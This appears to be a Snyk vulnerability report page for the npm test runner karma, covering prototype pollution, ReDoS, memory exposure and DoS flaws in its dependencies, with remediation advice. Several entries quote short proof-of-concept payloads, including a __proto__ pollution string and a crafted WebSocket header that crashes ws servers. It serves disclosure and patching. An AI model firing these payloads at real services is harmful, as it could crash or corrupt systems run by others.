Last tested: 01 Aug, 2018

karma vulnerabilities

Spectacular Test Runner for JavaScript.

View on npm

karma (latest)

Published 24 Jul, 2018

Known vulnerabilities6
Vulnerable paths9
Dependencies511

Prototype Pollution

low severity

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > hoek@2.16.3
  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > boom@2.10.1 > hoek@2.16.3
  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > cryptiles@2.0.5 > boom@2.10.1 > hoek@2.16.3
  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > sntp@1.0.9 > hoek@2.16.3

Overview

hoek is a Utility methods for the hapi ecosystem.

Affected versions of this package are vulnerable to Prototype Pollution. The utilities function allow modification of the Object prototype. If an attacker can control part of the structure passed to this function, they could add or modify an existing property.

PoC by Olivier Arteau (HoLyVieR)

var Hoek = require('hoek');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
Hoek.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Remediation

Upgrade hoek to versions 4.2.1, 5.0.3 or higher.

References

Time of Check Time of Use (TOCTOU)

medium severity

Detailed paths

  • Introduced through: karma@2.0.5 > chokidar@2.0.4 > fsevents@1.2.4 > node-pre-gyp@0.10.3 > tar@4.4.4 > chownr@1.0.1

Overview

Affected versions of chownr are vulnerable to Time of Check Time of Use (TOCTOU). It does not dereference symbolic links and changes the owner of the link.

Remediation

There is no fix version for chownr.

References

Uninitialized Memory Exposure

medium severity
  • Vulnerable module: tunnel-agent
  • Introduced through: log4js@2.11.0

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > tunnel-agent@0.4.3

Overview

tunnel-agent is HTTP proxy tunneling agent. Affected versions of the package are vulnerable to Uninitialized Memory Exposure.

A possible memory disclosure vulnerability exists when a value of type number is used to set the proxy.auth option of a request request and results in a possible uninitialized memory exposures in the request body.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

Details

Constructing a Buffer class with integer N creates a Buffer of length N with raw (not "zero-ed") memory.

In the following example, the first call would allocate 100 bytes of memory, while the second example will allocate the memory needed for the string "100":

// uninitialized Buffer of length 100
x = new Buffer(100);
// initialized Buffer with value of '100'
x = new Buffer('100');

tunnel-agent's request construction uses the default Buffer constructor as-is, making it easy to append uninitialized memory to an existing list. If the value of the buffer list is exposed to users, it may expose raw server side memory, potentially holding secrets, private data and code. This is a similar vulnerability to the infamous Heartbleed flaw in OpenSSL.

Proof of concept by ChALkeR

require('request')({
  method: 'GET',
  uri: 'http://www.example.com',
  tunnel: true,
  proxy:{
      protocol: 'http:',
      host:"127.0.0.1",
      port:8080,
      auth:80
  }
});

You can read more about the insecure Buffer behavior on our blog.

Similar vulnerabilities were discovered in request, mongoose, ws and sequelize.

Remediation

Upgrade tunnel-agent to version 0.6.0 or higher. Note This is vulnerable only for Node <=4

References

Insecure Randomness

medium severity

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > request@2.75.0 > hawk@3.1.3 > cryptiles@2.0.5

Overview

cryptiles is a package for general crypto utilities.

Affected versions of this package are vulnerable to Insecure Randomness. The randomDigits() method is supposed to return a cryptographically strong pseudo-random data string, but it was biased to certain digits. An attacker could be able to guess the created digits.

Remediation

Upgrade to version 4.1.2 and higher.

References

Regular Expression Denial of Service (ReDoS)

high severity

Detailed paths

  • Introduced through: karma@2.0.5 > log4js@2.11.0 > loggly@1.1.1 > timespan@2.3.0

Overview

timespan is a JavaScript TimeSpan library for node.js (and soon the browser).

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS). It parses dates using regex strings, which may cause a slowdown of 10 seconds per 50k characters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

There is no fix version for timespan.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: karma@2.0.5 > expand-braces@0.1.2 > braces@0.1.5

Overview

braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. It used a regular expression (^\{(,+(?:(\{,+\})*),*|,*(?:(\{,+\})*),+)\}) in order to detects empty braces. This can cause an impact of about 10 seconds matching time for data 50K characters long.

Disclosure Timeline

  • Feb 15th, 2018 - Initial Disclosure to package owner
  • Feb 16th, 2018 - Initial Response from package owner
  • Feb 18th, 2018 - Fix issued
  • Feb 19th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade braces to version 2.3.1 or higher.

References

Vulnerable versions of karma

Fixed in 2.0.0

Regular Expression Denial of Service (ReDoS)

medium severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > parsejson@0.0.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > parsejson@0.0.3

Overview

parsejson is a Method that parses a JSON string and returns a JSON object.

Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks. An attacker may pass a specially crafted JSON data, causing the server to hang.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

There is no fix available.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > debug@2.3.3
  • Introduced through: socket.io@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: nodemon@1.7.1 > debug@2.2.0
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > engine.io@1.8.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > debug@2.3.3
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0

Overview

debug is a JavaScript debugging utility modelled after Node.js core's debugging technique..

debug uses printf-style formatting. Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks via the the %o formatter (Pretty-print an Object all on a single line). It used a regular expression (/\s*\n\s*/g) in order to strip whitespaces and replace newlines with spaces, in order to join the data into a single line. This can cause a very low impact of about 2 seconds matching time for data 50k characters long.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade debug to version 2.6.9, 3.1.0 or higher.

References

Regular Expression Denial of Service (ReDoS)

low severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: mocha@1.7.1 > ms@0.3.0
  • Introduced through: nodemon@1.7.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > debug@2.3.3 > ms@0.7.2
  • Introduced through: socket.io@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: mocha@1.7.1 > ms@0.3.0
  • Introduced through: nodemon@1.7.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > engine.io@1.8.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > debug@2.3.3 > ms@0.7.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-adapter@0.5.0 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > socket.io-parser@2.3.1 > debug@2.2.0 > ms@0.7.1

Overview

ms is a tiny millisecond conversion utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to an incomplete fix for previously reported vulnerability npm:ms:20151024. The fix limited the length of accepted input string to 10,000 characters, and turned to be insufficient making it possible to block the event loop for 0.3 seconds (on a typical laptop) with a specially crafted string passed to ms() function.

Proof of concept

ms = require('ms');
ms('1'.repeat(9998) + 'Q') // Takes about ~0.3s

Note: Snyk's patch for this vulnerability limits input length to 100 characters. This new limit was deemed to be a breaking change by the author. Based on user feedback, we believe the risk of breakage is very low, while the value to your security is much greater, and therefore opted to still capture this change in a patch for earlier versions as well. Whenever patching security issues, we always suggest to run tests on your code to validate that nothing has been broken.

For more information on Regular Expression Denial of Service (ReDoS) attacks, go to our blog.

Disclosure Timeline

  • Feb 9th, 2017 - Reported the issue to package owner.
  • Feb 11th, 2017 - Issue acknowledged by package owner.
  • April 12th, 2017 - Fix PR opened by Snyk Security Team.
  • May 15th, 2017 - Vulnerability published.
  • May 16th, 2017 - Issue fixed and version 2.0.0 released.
  • May 21th, 2017 - Patches released for versions >=0.7.1, <=1.0.0.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade ms to version 2.0.0 or higher.

References

Regular Expression Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: bower@1.7.1 > glob@4.5.3 > minimatch@2.0.10
  • Introduced through: nodemon@1.7.1 > minimatch@0.3.0

Overview

minimatch is a minimalistic matching library used for converting glob expressions into JavaScript RegExp objects. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Many Regular Expression implementations may reach edge cases that causes them to work very slowly (exponentially related to input size), allowing an attacker to exploit this and can cause the program to enter these extreme situations by using a specially crafted input and cause the service to excessively consume CPU, resulting in a Denial of Service.

An attacker can provide a long value to the minimatch function, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the event loop and preventing it from processing other requests and making the server unavailable (a Denial of Service attack).

You can read more about Regular Expression Denial of Service (ReDoS) on our blog.

Remediation

Upgrade minimatch to version 3.0.2 or greater.

References

Prototype Pollution

low severity

Detailed paths

  • Introduced through: bower@1.7.1 > inquirer@0.10.0 > lodash@3.10.1
  • Introduced through: bower@1.7.1 > insight@0.7.0 > inquirer@0.10.1 > lodash@3.10.1
  • Introduced through: karma@1.7.1 > lodash@3.10.1

Overview

lodash is a javaScript utility library delivering modularity, performance & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The utilities function allow modification of the Object prototype. If an attacker can control part of the structure passed to this function, they could add or modify an existing property.

PoC by Olivier Arteau (HoLyVieR)

var _= require('lodash');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
_.merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Remediation

Upgrade lodash to version 4.17.5 or higher.

References

Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: socket.io@1.7.1 > engine.io@1.8.1 > ws@1.1.1
  • Introduced through: socket.io@1.7.1 > socket.io-client@1.7.1 > engine.io-client@1.8.1 > ws@1.1.1
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > engine.io@1.8.3 > ws@1.1.2
  • Introduced through: karma@1.7.1 > socket.io@1.7.3 > socket.io-client@1.7.3 > engine.io-client@1.8.3 > ws@1.1.2

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

PoC:

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade ws to version 1.1.5, 3.3.1 or higher.

References

Fixed in 1.5.0

Insecure Randomness

medium severity

Detailed paths

  • Introduced through: socket.io@1.4.1 > engine.io@1.6.5 > ws@1.0.1
  • Introduced through: socket.io@1.4.1 > socket.io-client@1.4.1 > engine.io-client@1.6.5 > ws@1.0.1
  • Introduced through: karma@1.4.1 > socket.io@1.7.2 > engine.io@1.8.2 > ws@1.1.1
  • Introduced through: karma@1.4.1 > socket.io@1.7.2 > socket.io-client@1.7.2 > engine.io-client@1.8.2 > ws@1.1.1

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package use the cryptographically insecure Math.random() which can produce predictable values and should not be used in security-sensitive context.

Details

Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated.

There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value. In general, if a PRNG algorithm is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts.

You can read more about node's insecure Math.random() in Mike Malone's post.

Remediation

Upgrade ws to version 1.1.2 or higher.

References

Fixed in 1.4.0

Regular Expression Denial of Service (DoS)

high severity

Detailed paths

  • Introduced through: karma@1.3.0 > socket.io@1.4.7 > engine.io@1.6.10 > accepts@1.1.4 > negotiator@0.4.9

Overview

negotiator is an HTTP content negotiator for Node.js. Versions prior to 0.6.1 are vulnerable to Regular expression Denial of Service (ReDoS) attack when parsing "Accept-Language" http header.

